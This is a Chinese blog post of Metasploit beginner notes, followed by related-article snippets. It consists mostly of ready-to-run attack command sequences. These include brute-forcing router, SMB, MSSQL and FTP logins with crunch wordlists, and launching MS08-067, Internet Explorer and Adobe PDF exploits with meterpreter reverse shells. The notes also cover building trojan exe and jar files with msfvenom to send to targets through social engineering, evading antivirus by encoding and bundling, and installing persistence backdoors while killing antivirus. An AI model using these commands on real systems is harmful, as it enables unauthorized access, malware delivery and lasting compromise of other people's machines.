MSF入门笔记

已于 2022-12-26 12:53:22 修改
阅读量1k 收藏 5
点赞数
分类专栏: 笔记 文章标签: Metasploit
于 2019-01-16 11:21:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/imtech/article/details/86504663
版权

玩转Kali 2.0

Metasploit破解路由器密码

步骤:寻找渗透目标;制作密码字典;进行密码破解;进入路由器。

  1. ie输入192.168.1.1
    可以看到输入用户名密码的弹出窗口
  2. crunch
    crunch 3 4 1234567890 -o user.lst #生成3-4位的0-9的密码。
    crunch 8 8 -l 19@@0728 -o user.lst #生成8位的包含19**0728的密码
  3. 启动Metasploit
    msfconsole
    use auxiliary/scanner/http/http_login
    show options
    set rhosts 192.168.1.1
    set rport 80
    set username admin
    set pass_file /root/ps.lst
    设置完毕以后show options,查看参数设置是否成功,没有问题后执行:
    exploit
    然后开始暴力破解。
    4.破解成功

Metasploit破解指定服务器密码

步骤:寻找渗透目标;制作密码字典;进行密码破解;成功拿到服务器权限。

  1. windows 2003系统作为目标
    启动msf
    检查当前局域网环境下存活的主机
    msf > use auxiliary/scanner/discovery/arp_sweep
    set rhosts 192.168.1.100/24
    set threads 50
    exploit
    能找到存活主机
    msf > use auxiliary/scanner/smb/smb_version
    set rhosts 192.168.1.100
    set threads 50
    exploit
    操作系统版本收集,信息收集阶段完成
  2. 制作字典
    crunch
  3. 破解
    msf > use auxiliary/scanner/smb/smb_login
    set rhosts 192.168.43.158
    set threads 50
    set pass_file /root/pass.txt
    exploit
  4. 拿到服务器权限
    打开远程桌面,用刚才破解到的密码登陆

Metasploit破解mssql密码

步骤:收集目标;制作字典;进行密码破解。

  1. 收集目标
    搭建了一个windows 2003,安装了mssql 2000数据库。
    用以上教程,扫描当前存活主机,收集操作系统版本。
    msf > use auxiliary/scanner/discovery/arp_sweep
    网络扫描,选取一个作为目标
    msf > use auxiliary/scanner/portscan/syn
    端口探测,检测到打开了1433端口
    msf > use auxiliary/scanner/smb/smb_version
    扫描主机名称,操作系统,版本
  2. 制作字典
    crunch
  3. 进行密码破解
    msf > use auxiliary/scanner/mssql/mssql_login
    show options
    set rhosts
    set rport
    set username sa
    set pass_file /root/ps.lst
    set theards 50

Metasploit破解ftp密码

步骤:寻找目标;制作字典;进行破解。

  1. 收集目标
    参考以上内容
  2. 制作字典
  3. 参考以上内容
  4. 进行破解
    use auxiliary/scanner/ftp/ftp_version #检测版本
    use auxiliary/scanner/ftp/anonymous #测试是否支持匿名登陆
    use auxiliary/scanner/ftp/ftp_login #破解
    set rhosts 192.168.1.100
    set rport 21
    set username admin
    set pass_file /root/ps.lst
    exploit

Metasploit系列简单教程

ms08_067示例

msf>use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
可以使用info命令查看漏洞的信息
run开始攻击

浏览器漏洞ms10_018

msf>use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
show targets

快捷方式漏洞ms10_046

PDF漏洞利用

CVE-2010-2883

use exploit/windows/fileformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
生成pdf文件让客户端打开。
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

爆破模块

生成木马

当不存在漏洞的时候可以通过社会工程学,把生成的木马发送给对方。
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率。利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
msfvenom也可以多次编码,也可以捆绑其他软件。
upx可以对程序进行再次加壳,压缩。
veil 免杀生成木马
配合msf连接被控制端。

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f exe > /root/test.exe
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f jar > /root/text.jar
生成test.exe和java.jar木马
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
#msf exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
这里payload不一样
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > run

免杀

veil
veil-evesion 基于msf负载模块生成exe,也需要msf 侦听。
shellter 捆绑工具
免杀有2种办法,可以用捆绑,可以用多次编码。
捆绑,shellter,可以将上面生成的木马捆绑到正常的exe当中。

维持访问

在meterpreter下面执行run persistence 可以设置后门在系统启动、用户登录时执行。
维持访问。即使删除掉源文件也可以。
run persistence -h 查看帮助。
设置完毕以后需要重启。
run scheduleme
持续性后门
run kill av 关闭杀毒软件
run

骆驼1024
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSF技术总结
05-07
MSF 技术总结 MSFMetasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
MSF(一):MSF基础
1stPeak's Blog
02-21 4400
MSF基础 一、前言 msfconsole 作用:打开msf PS:当前版本的msf不需要再msfconsole之前再输入service postgresql start,以前的版本可能需要 msfdb init 作用:初始化msfdb msfdb start 作用:开启msfdb msfdb stop 作用:暂停msfdb 疑难解决:如果出现如下所示问题,初始化数据库即可 二、基本内容 在...
MSF初学
h0ld1rs的博客
08-10 319
文章目录技术功能模块exploits(布局)payload(正面战场)auxiliary(侦察兵)encoders(伪装)nops(buff)使用msfconsoleconnectsearchuseshoweditcheck 今天开始学习MSF,查阅了一些资料可以知道,这是一个很强大的渗透工具 大家可以打开kali’,直接在命令行窗口输入msfconsole,然后回车。这样就打开了msfconsole。Msfconsole的系统文件和用户文件位于/usr/share/metasploit-framewor
2024最新最全【MSF基础与应用】零基础入门到精通,看完这一篇就够了!
最新发布
wholeliubei的博客
05-18 461
Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。MSF可向后端模块提供多种用来控制测试的接口,如控制台、web、GUI、CLI等,通过这些接口访问和使用MSF中的所有插件工具,同时MSF控制台还有第三方程序的接口,例如nmap、sqlmap等。MSF可以运行在linux和windows环境下,我们一般通常都在kali linux操作系统上使用。
MSF(Metasploit Framework)详细介绍及用法【新手篇】
h1008685的博客
04-04 3089
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
MSF基础
CP1024的博客
10-19 460
MSF基础知识 Metasploit框架是一个开源工具,目的是方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 需要在命令行输入msconsole 知识点: 更新命令: 1. apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 2. apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。 3. apt-get dist-upgrade:升级整
msf使用基础
qq_46804551的博客
05-03 626
前言 msf是后渗透神奇,在kali中已经内置有。 1.1 基础使用 metasploit程序需要使用postgresql数据库 手动启动数据库: service postgresql start 设置成开机启动数据库: systemctl enable postgresql 启动msf msfconsole 1.2.查找模块 search 模块名 //比如我要找永恒之蓝 search ms17_010 使用那个模块 use 模块名或use 前面的数字都可以 1.3使用模块 #查看要设置的参
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
自己用的1433弱口令字典
04-14
网上找的字典有的很长,用的感觉也不怎么样,自己综合修改了下,一个很小的字典,但很实用喔!
msf的基础使用
L1928的博客
08-31 265
Msf 1.msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5555 -f exe x>123.exe 生成木马 -a选择架构 -f输出文件格式 -o文件输出 windows/meterpreter/reverse_tcp 攻击载荷 LHOST=192.168.1.109 本机地址 LPORT=5555 端口号 2.msfconsole 启动msf 3.use exploit/multi
Metasploit(MSF)基础超级详细版
热门推荐
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
《微软软件研发的奥秘:MSF精髓》书评
weixin_34383618的博客
02-25 65
英文书名是:《Microsoft Solutions Framework Essentials: Building Successful Technology Solutions》在china-pub上的链接是:http://www.china-pub.com/195976在当当上的链接是:http://product.dangdang.com/product.aspx?product_id=20...
MSF学习之旅之初识MSF
0nc3的博客
06-12 801
0x00 前言 emmmm刚接触Metasploit还有点懵,记录一下学习过程 参考了《Metasploit渗透测试指南》一书 0x01 安装MSF终端 Kali无需安装,自带 0x02 启动MSF终端 两种方法: 方法一:在图形界面直接打开 方法二:命令行输入msfconsole 0x02 使用Armitage 可以直接点击运行,也可通过armitage命令运行 选择Connect–&gt...
MSF利用最新IE最新漏洞
www.i201314.net
07-01 1108
通过 backtrack 漏洞发布官网 了解最新漏洞 漏洞描述:漏洞存在iepeers.dll组件中,影响ie6 7 影响系统:sp0-3、ie 6 7 使用命令 show exploits use exploit/windows/browser/ie_iepeers_pointer show options set PAYLOAD windows/exec set CMD net user
Beef加载msf插件---metasploit对IE浏览器的极光漏洞进行渗透利用
wkend的博客
03-22 1577
1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 再开一个终端,输入msfconsole,打开msf 控制台,输入下列命令 在另一个开启的终端(就是包含beef可执行文件的目录)下输入以下命...
利用密码字典暴力破解渗透目标系统
Cwillchris的博客
10-18 2394
实验名称:利用密码字典渗透目标系统 实验人:XX 实验日期:2021.9.23 实验目的:利用SMB、FTP渗透windows,利用SSH渗透centos 实验环境: kali:172.16.12.30 windows靶机:172.16.12.10 用户名:administrator 密码:c!112233 centos靶机:172.16.12.11 用户名:root 密码:123 实验步骤: 一、利用SMB远程登录模块渗透windows 确保windows开启允许远程连接 1、假
msf脚本
05-24
MSFMetasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行特定的攻击或者扫描操作。 MSF中的脚本通常使用Ruby语言编写,脚本文件的后缀名为.rb。使用MSF中的脚本需要掌握一定的Ruby编程知识和MSF框架的使用方法。下面是一个简单的MSF脚本示例: ```ruby require 'msf/core' class MyModule < Msf::Auxiliary def initialize super( 'Name' => 'My Module', 'Description' => 'This is my module', 'Author' => 'Me', 'License' => MSF_LICENSE ) register_options([ OptString.new('TARGETHOST', [true, 'The target host', '']), OptPort.new('TARGETPORT', [true, 'The target port', 80]) ]) end def run target_host = datastore['TARGETHOST'] target_port = datastore['TARGETPORT'] # Do some stuff here end end ``` 这个脚本定义了一个名为"My Module"的模块,它需要用户输入目标主机的IP地址和端口号,并在run方法中实现一些攻击或扫描的操作。在使用MSF时,可以通过load命令加载该脚本,并在MSF的命令行界面中执行该模块。 需要注意的是,MSF是一个强大的攻击工具,使用不当可能会对他人造成损害,请务必遵守相关法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

骆驼1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值